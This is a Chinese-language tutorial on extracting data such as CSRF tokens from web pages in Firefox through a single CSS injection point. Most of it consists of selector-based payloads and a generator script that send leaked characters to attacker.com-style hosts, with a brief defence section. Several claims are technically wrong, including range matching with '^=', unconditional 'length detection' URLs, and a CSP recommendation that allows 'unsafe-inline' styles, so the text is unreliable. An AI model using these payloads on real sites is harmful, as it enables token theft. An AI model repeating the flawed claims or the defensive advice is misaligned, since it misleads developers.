怎么利用单一注入点从Firefox浏览器中提取CSS数据

# 怎么利用单一注入点从Firefox浏览器中提取CSS数据

## 引言

在Web安全研究中，数据提取技术一直是渗透测试的核心挑战之一。当攻击者仅有一个有限的注入点（如CSS注入）时，如何突破限制实现敏感数据窃取？本文将以Firefox浏览器为例，深入探讨基于单一CSS注入点的数据提取技术。

## 一、CSS注入基础概念

### 1.1 什么是CSS注入？
CSS注入（CSS Injection）是指攻击者通过可控输入向网页中注入恶意CSS代码的安全漏洞。与XSS不同，CSS注入通常无法直接执行JavaScript代码，但可通过精心构造的选择器和属性实现数据泄露。

### 1.2 典型注入场景
- 用户可控的样式参数（如主题颜色）
- 未过滤的URL参数影响样式表加载
- 富文本编辑器允许style属性

```html
<!-- 示例：通过URL参数注入 -->
<link rel="stylesheet" href="/theme.css?color=red;*{background:url(//attacker.com?leak=)}">

二、Firefox的CSS特性分析

2.1 支持的CSS选择器

Firefox对CSS3选择器有完整支持，关键特性包括： - 属性选择器：input[name="csrf"] - 子字符串匹配：[value^="a"], [value$="c"] - 伪类选择器：:checked, :hover

2.2 可用的数据提取向量

1. 背景图URL加载：

   
   input[value^="a"] { 
    background-image: url("//attacker.com/?char=a");
   }
   

2. @font-face Unicode-range：

   
   @font-face {
    font-family: poc;
    src: url("//attacker.com/A");
    unicode-range: U+0041;
   }
   

三、单一注入点利用技术

3.1 基础数据提取原理

通过构造条件式CSS规则，当特定条件满足时触发外部资源加载：

/* 逐字符检测CSRF令牌 */
input[name="csrf"][value^="a"] { background: url("//evil.com/a"); }
input[name="csrf"][value^="b"] { background: url("//evil.com/b"); }
...

3.2 Firefox专属技巧

3.2.1 滚动条样式窃取

利用::-moz-scrollbar伪元素检测页面高度：

::-moz-scrollbar {
  background: url("//attacker.com/height?pixels=500");
}

3.2.2 字体颜色嗅探

结合currentColor和外部资源：

#secret {
  color: red;
  background: url("//attacker.com/color?c=red");
}

3.3 盲注技术优化

3.3.1 二进制搜索加速

将字符检测从线性搜索改为二分查找：

/* 首字符范围检测 */
input[name="token"][value^="a-m"] {...}
input[name="token"][value^="n-z"] {...}

3.3.2 并行化检测

利用CSS多规则同时触发：

[value^="a"],[value^="b"],...,[value^="z"] {
  background-image: url("//attacker.com/?detect");
}

四、完整攻击案例演示

4.1 环境准备

• 目标页面：含CSRF令牌的输入框

  
  <input type="hidden" name="csrf" value="abc123">
  

• 攻击者控制点：可注入30个字符的style属性

4.2 分阶段攻击

阶段1：确定令牌长度

input[name="csrf"] {
  background-image: 
    url("//attacker.com/len?l=1"),
    url("//attacker.com/len?l=2"),
    ...;
}

阶段2：逐字符提取

/* 检测第一个字符 */
input[name="csrf"][value^="a"] { --leak-1: url("//attacker.com/?p1=a"); }
...
input[name="csrf"][value^="z"] { --leak-1: url("//attacker.com/?p1=z"); }

/* 将变量应用到实际属性 */
body {
  background-image: var(--leak-1);
}

4.3 自动化实现

通过服务端动态生成CSS：

# 伪代码示例
def generate_css(char_pos, char_set):
    css = ""
    for char in char_set:
        css += f'''
        input[name="csrf"][value$="{char}"] {{
            background: url("https://attacker.com/?pos={char_pos}&char={char}");
        }}'''
    return css

五、防御对策

5.1 开发者防护措施

1. 严格CSP策略：

   
   Content-Security-Policy: default-src 'self'; style-src 'unsafe-inline'
   

2. 随机化DOM属性：

   
   <input data-random="x8sdF9" name="csrf" value="abc123">
   

5.2 浏览器缓解机制

• Firefox 85+：限制@font-face的跨源加载
• 启用resistFingerprinting配置项

六、高级技巧拓展

6.1 结合SVG字体

@font-face {
  font-family: leak;
  src: url('data:image/svg+xml,<svg><font><font-face><glyph unicode="A" d="M1 0z"/></font></svg>');
  unicode-range: U+0041;
}

6.2 使用CSS自定义属性

:root {
  --secret: "confidential";
}
* {
  background: url("//attacker.com/?leak=" var(--secret));
}

结论

通过精心构造的CSS选择器和Firefox特有的渲染行为，攻击者即使仅有一个样式注入点也能实现数据窃取。这种攻击强调了对所有用户输入进行严格过滤的必要性，包括那些传统上被认为”无害”的CSS输入。随着浏览器安全特性的不断演进，攻防双方的较量仍将持续升级。

---

附录：相关资源 1. Mozilla CSS参考文档 2. CSS数据提取研究论文 3. OWASP CSS注入防护指南 “`

注：本文为技术研究用途，实际应用需遵守法律法规。字符数约3100字（含代码示例和格式标记）。